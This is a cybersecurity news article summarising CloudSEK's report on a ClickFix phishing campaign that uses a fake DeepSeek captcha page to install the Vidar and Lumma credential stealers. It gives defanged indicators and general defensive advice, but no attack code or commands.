CloudSEK Uncovers ClickFix Phishing Campaign Targeting Users
CloudSEK’s Threat Intelligence Team has uncovered a dangerous ClickFix phishing campaign that weaponizes DeepSeek’s brand name to deceive users and install credential-stealing malware.
The ‘DeepSeek ClickFix Scam’-How It Works
Cybercriminals have set up a fake domain (deepseekcaptcha[.]top) that mimics a DeepSeek verification page, tricking users into clicking a fraudulent “captcha verification” button. Once clicked, the page automatically executes a PowerShell command, infecting the victim’s device with Vidar Stealer and Lumma Stealer malware.
The malware exfiltrates credentials, financial data, and session tokens, specifically targeting Steam and Telegram users. The attackers have also leveraged Cloudflare hosting to evade AI-based security detections, keeping the domain active and undetected for a prolonged period.
- Key Findings from CloudSEK’s Research:
Fake DeepSeek-branded captcha page tricks users into downloading malware. - ClickFix attack method deploys a PowerShell command to install Vidar Stealer.Lumma Stealer and Vidar Stealer are actively being distributed.
- Cloudflare is used to mask the malicious domain and prevent early detection.
- The phishing attack primarily targets AI users and communities reliant on DeepSeek.
- Malware campaign is hosted on IP 147.45.44[.]209, where various scripts and executables were discovered.
The Growing Threat: AI’s Popularity Fuels Cybercrime
The DeepSeek ClickFix scam is part of a larger trend in cybercrime where attackers leverage AI’s rapid adoption to exploit user trust in technology.
CloudSEK researchers have observed that AI-driven scams are becoming more targeted and deceptive, bypassing traditional security mechanisms. The use of fake verification pages, social media integration, and Cloudflare masking techniques makes these attacks harder to detect and neutralize.
Cybersecurity experts emphasize that AI-driven phishing campaigns are evolving, making it harder to detect using traditional security tools.
How to Stay Safe-CloudSEK’s Recommendations
- Double-Check Website URLs: Always verify if a website is legitimate before entering credentials.
- Beware of Fake Captcha Pages: AI platforms do not require repeated captchas. If prompted, proceed with caution.
- Enable Multi-Factor Authentication (MFA): Even if credentials are stolen, MFA can prevent unauthorized access.
- Use Advanced Anti-Phishing Protection: Organizations should deploy email filtering solutions and domain monitoring tools to detect phishing sites early.
- Regularly Update Software: Ensure that your device and security software are up to date to prevent vulnerabilities.
Final Thoughts: AI Security is a Shared Responsibility
As AI continues to transform industries, its security risks must not be ignored. The DeepSeek ClickFix Scam is a wake-up call for businesses, researchers, and end-users to adopt proactive cybersecurity measures.
